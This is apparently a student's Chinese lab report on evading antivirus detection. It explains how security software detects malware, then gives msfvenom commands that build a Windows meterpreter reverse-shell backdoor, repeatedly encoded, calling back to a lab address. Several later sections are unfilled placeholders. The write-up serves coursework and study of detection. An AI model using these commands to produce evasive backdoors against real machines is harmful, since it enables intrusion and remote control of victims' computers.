20192421 2021-2022-2 《网络与系统攻防技术》实验三实验报告
作者:互联网
一、实验内容
1.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
- 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
- veil,加壳工具
- 使用C + shellcode编程
2.通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
二、实验要求
- 掌握免杀原理与技术
- 回答问题
1.杀软是如何检测出恶意代码的?
一共有三种检测方式:
(1)检测特征码
人有自己的特征,代码也有自己的特征。杀毒软件都有着一套专门的特征库,依靠检索程序代码是否和库中特征码吻合来判断某段代码是否属于病毒。
(2)启发式恶意软件检测
如果该程序的特征和行为与病毒程序类似,其匹配程度达到一定程度就可以认为该程序是病毒程序。
(3)基于行为检测
与启发式检测类似,只是单纯依靠监测程序行为来作为标准。杀软通过检测程序是否有更改注册表行为、是否有设置自启动、是否有修改权限等等恶意行为,判断程序是否属于恶意代码。
2.免杀是做什么?
通过一些手段来瞒过杀软的检测扫描,避免被杀毒软件查杀,并能成功控制被植入机
3.免杀的基本方法有哪些?
(1)改变特征码
- exe加壳
- 有shellcode可以用encode进行编码
- 有源代码可以用veil-evasion进行重写再编译
(2)改变行为
- 尽量使用反弹式连接、使用隧道技术
- 基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码
三、实验过程
1.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
(1)使用工具对实验2中所生成的后门程序进行检验
通过使用VirusTotal或者Virscan等工具进行扫描,在VirusTotal工具中的扫描结果:68款杀毒软件有53款能够检测出此后门程序;在Virscan工具中的扫描结果:51款杀毒软件有18款能够检测出此后门程序。检测结果如下图所示:
(2)使用Metasploit的编码器尝试使后门程序能够免杀,首先,我们来了解一下Metasploit的编码器有哪些,使用如下命令查看Metasploit的编码器:
msfvenom --list encoders
结果如下图:
(3)使用x86/shikata_ga_nai对后门程序进行一次编码,使用命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.31.198 LPORT=2421 -f exe > msf192421.exe # 其中192.168.31.198为Windows反弹回连Kali的IP地址
再次使用工具VirusTotal和Virscan扫描后门程序,在VirusTotal工具中的扫描结果:68款杀毒软件有49款能够检测出此后门程序;在Virscan工具中的扫描结果:51款杀毒软件有16款能够检测出此后门程序。结果如下图:
可以发现只编码一次,对于程序免杀实现作用不大。
(4)使用x86/shikata_ga_nai对后门程序进行多次编码,再次生成新的exe文件
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i -20 -b '\x00' LHOST=192.168.31.198 LPORT=2421 -f exe > msf20192421.exe
-i是迭代次数,这里我们选择迭代20次
再次使用VirusTotal来检测生成的后门程序,如图所示,VirusTotal的检出率为49/69可以发现,进行20次编码对于实现免杀也没有什么作用。
四、问题及解决方案
- 问题1:XXXXXX
- 问题1解决方案:XXXXXX
- 问题2:XXXXXX
- 问题2解决方案:XXXXXX - ...
五、学习感悟、思考等
xxx xxx
参考资料
标签:编码器,exe,免杀,检测,程序,20192421,2022,使用,2021 来源: https://www.cnblogs.com/zyh12345/p/16127117.html